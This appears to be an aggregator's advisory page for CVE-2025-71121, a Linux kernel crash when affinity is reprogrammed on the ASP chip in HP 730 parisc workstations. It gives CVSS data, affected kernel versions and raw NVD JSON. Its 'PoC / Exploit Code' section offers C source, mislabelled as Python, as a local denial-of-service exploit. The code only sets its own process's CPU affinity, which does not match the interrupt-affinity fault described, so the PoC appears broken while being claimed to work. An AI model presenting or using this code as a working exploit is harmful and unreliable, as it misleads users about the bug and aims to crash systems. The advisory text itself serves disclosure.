Security Vulnerability Report
中文
CVE-2025-71121 CVSS 5.5 MEDIUM

CVE-2025-71121

Published: 2026-01-14 15:16:02
Last Modified: 2026-03-25 18:37:37
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: parisc: Do not reprogram affinitiy on ASP chip The ASP chip is a very old variant of the GSP chip and is used e.g. in HP 730 workstations. When trying to reprogram the affinity it will crash with a HPMC as the relevant registers don't seem to be at the usual location. Let's avoid the crash by checking the sversion. Also note, that reprogramming isn't necessary either, as the HP730 is a just a single-CPU machine.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel (parisc架构) - 所有未应用修复的版本
HP 730工作站运行的Linux内核
使用ASP芯片的HP系统

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// PoC for CVE-2025-71121 - Local DoS via CPU affinity reprogramming on ASP chip // Compile: gcc -o cve202571121_poc cve202571121_poc.c // Run as low-privilege user on vulnerable HP 730 workstation with parisc architecture #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <sched.h> #include <unistd.h> int main() { cpu_set_t mask; int cpu_count; printf("[*] CVE-2025-71121 PoC - Linux kernel parisc ASP chip DoS\n"); printf("[*] Target: HP 730 workstation with ASP chip\n"); // Get number of available CPUs cpu_count = sysconf(_SC_NPROCESSORS_ONLN); printf("[*] Detected %d CPU(s)\n", cpu_count); if (cpu_count <= 1) { printf("[!] Single CPU system - vulnerability may still trigger\n"); } // Attempt to set affinity to each available CPU for (int i = 0; i < cpu_count; i++) { CPU_ZERO(&mask); CPU_SET(i, &mask); printf("[*] Attempting sched_setaffinity for CPU %d...\n", i); if (sched_setaffinity(0, sizeof(cpu_set_t), &mask) == -1) { perror("[!] sched_setaffinity failed"); continue; } printf("[+] Successfully set affinity to CPU %d\n", i); sleep(1); } printf("[*] PoC completed - check for HPMC crash on ASP chip systems\n"); return 0; } // Note: This vulnerability specifically affects parisc architecture with ASP chip // On vulnerable systems, calling sched_setaffinity may trigger HPMC and system crash // The vulnerability occurs because ASP chip registers are at non-standard locations

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-71121", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-14T15:16:01.800", "lastModified": "2026-03-25T18:37:36.883", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nparisc: Do not reprogram affinitiy on ASP chip\n\nThe ASP chip is a very old variant of the GSP chip and is used e.g. in\nHP 730 workstations. When trying to reprogram the affinity it will crash\nwith a HPMC as the relevant registers don't seem to be at the usual\nlocation. Let's avoid the crash by checking the sversion. Also note,\nthat reprogramming isn't necessary either, as the HP730 is a just a\nsingle-CPU machine."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nparisc: No reprogramar la afinidad en el chip ASP\n\nEl chip ASP es una variante muy antigua del chip GSP y se usa, por ejemplo, en estaciones de trabajo HP 730. Al intentar reprogramar la afinidad, se bloqueará con un HPMC ya que los registros relevantes no parecen estar en la ubicación habitual. Evitemos el bloqueo comprobando la sversion. También hay que tener en cuenta que la reprogramación tampoco es necesaria, ya que la HP730 es solo una máquina de una sola CPU."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.14.276", "versionEndExcluding": "4.15", "matchCriteriaId": "0006EA87-A109-46BF-BD6A-258CB03636CA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.19.238", "versionEndExcluding": "4.20", "matchCriteriaId": "8E1B92C6-983C-46C3-B89B-7ACE7DA97AB4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.4.189", "versionEndExcluding": "5.5", "matchCriteriaId": "A076F9B9-CCF6-4F22-A942-AEE27FDDBF0D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.10.111", "versionEndExcluding": "5.10.248", "matchCriteriaId": "64287ED3-3D08-4E57-B66C-8ED09A9A7339"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.15.34", "versionEndExcluding": "5.15.198", "matchCriteriaId": "CCF7BDD9-E7DC-4B66-94DF-08F251A877D5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16.20", "versionEndExcluding": "5.17", "matchCriteriaId": "0854057A-1882-4E17-8A6D-E294867B22EE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.17.3", "versionEndExcluding": "5.18", "matchCriteriaId": "A8771EE7-7703-460B-ABE5-ACA38B3F4E3D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.18.1", "versionEndExcluding": "6.1.160", "matchCriteriaId": "11B57CAB-79F6-4A4B-A20B-F1E319A8A998"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.120", "matchCriteriaId": "43C3A206-5EEE-417B-AA0F-EF8972E7A9F0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.64", "matchCriteriaId": "32BF4A52-377C-44ED-B5E6-7EA5D896E98B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.3", "matchCriteriaId": "2DC484D8-FB4F-4112-900F-AE333B6FE7A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:5.18:-:*:*:*:*:*:*", "matchCriteriaId": "0384FA0A-DE99-48D7-84E3-46ED0C3B5E03"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaI ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.